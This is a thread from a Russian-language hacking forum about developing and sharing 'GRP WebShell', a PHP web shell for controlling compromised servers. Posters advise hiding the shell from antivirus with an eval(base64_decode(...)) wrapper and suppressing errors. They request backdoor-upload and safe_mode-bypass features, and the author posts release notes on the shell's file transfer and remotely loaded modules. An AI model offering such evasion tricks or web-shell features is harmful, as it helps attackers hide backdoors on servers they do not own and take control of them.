• XSS.stack #1 – первый литературный журнал от юзеров форума

GRP WebShell

с base64, DES, SHA1, md5 кодированием и декодированием
выдеру из веб-тулз наших :)

Установил на свой хост, на котором установлен cPanel c модом Virus Scan в результате залить не получилось:
Цитата|Quote
Virus Detected; File not Uploaded! (PHP.Defash.B FOUND)
попробуй закодировать в base64 и написать
<? eval(base64_decode("тут шелл в base64")); ?>
Хотя не факт, что прокатит. А что ты хочешь - реакция антивирей на r57, c99 и прочее - аналогичная
 
Неплохо бы что-то вроде error_reporting(0) поставить в начале... Или что-то менее радикальное, но аналогичное... Так как при выводе всех ошибок получается прикольная вещь :)
 

Вложения

  • great_shell.jpg
    great_shell.jpg
    68 КБ · Просмотры: 180
Great
Предлагаю можеш сделать шелл с 4мя функциями -

закачка/удаление файла
листинг директорий
закачка бекдора на сервер

думаю много весить не будет)
-
с обходом safe_mode on вообще кул будет =)
 
GRP Web-Shell 2.0 release
Первая релиз-версия моего шелла.
Отличия от беты:
  • Возможность закачки файлов на сервер
  • Возможность скачки файлов с сервера
  • Система модулей. В виде модуля вынесен из скрипта браузер (модуль весит 9,4Кб), размер ядра составляет 15,8Кб
  • Исправлены некоторые недочеты в коде
Насчет системы модулей. Сорсы модулей находятся по адресу http://xss.pro/files/scripts/grp_mod/. Пока что там лежит только один модуль - browse (браузер файлов + закачка файлов).
При загрузке модуля он устанавливается автоматически. При этом создается бекап скрипта и скрипт для восстановления. Если установка сорвалась, то можно вызвать файл grp_repair.php (или нажать Repair) и он восстановит предыдущую версию скрипта. Если установка прошла успешно, можно нажать "Delete Repair" для удаления бекапа и восстановочного скрипта.
Сверху есть табличка со списком установленных модулей, кнопками "Repair" и "delete repair" (появляются после установки новых модулей и исчезают после удаления бекапа) и кнопкой "Load more" для открытия страницы со списком доступных модулей и линками на установку.
В списке модулей, открываемом по странице "Load more" доступные модули отмечаются зеленым цветом, недоступные - красным. Например, модуль browse будет отмечен зеленым, в то время как предусмотренный скриптом модуль mysql - красным (он пока не установлен на сервере и недоступен для скачивания).

Ядро:
Для тех, у кого нет выхода в инет для скачивания модулей - шелл с установленным браузером (текущия версия):
 
>>Потому что так проще писать было и использовать его смогут не только у нас
Так можно сделать 2 языка ;-) (впринципе я англ. знаю на уровне адванс, но знаю многих достойных людей, которые знают его на уровне команд линукса и Cи).
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх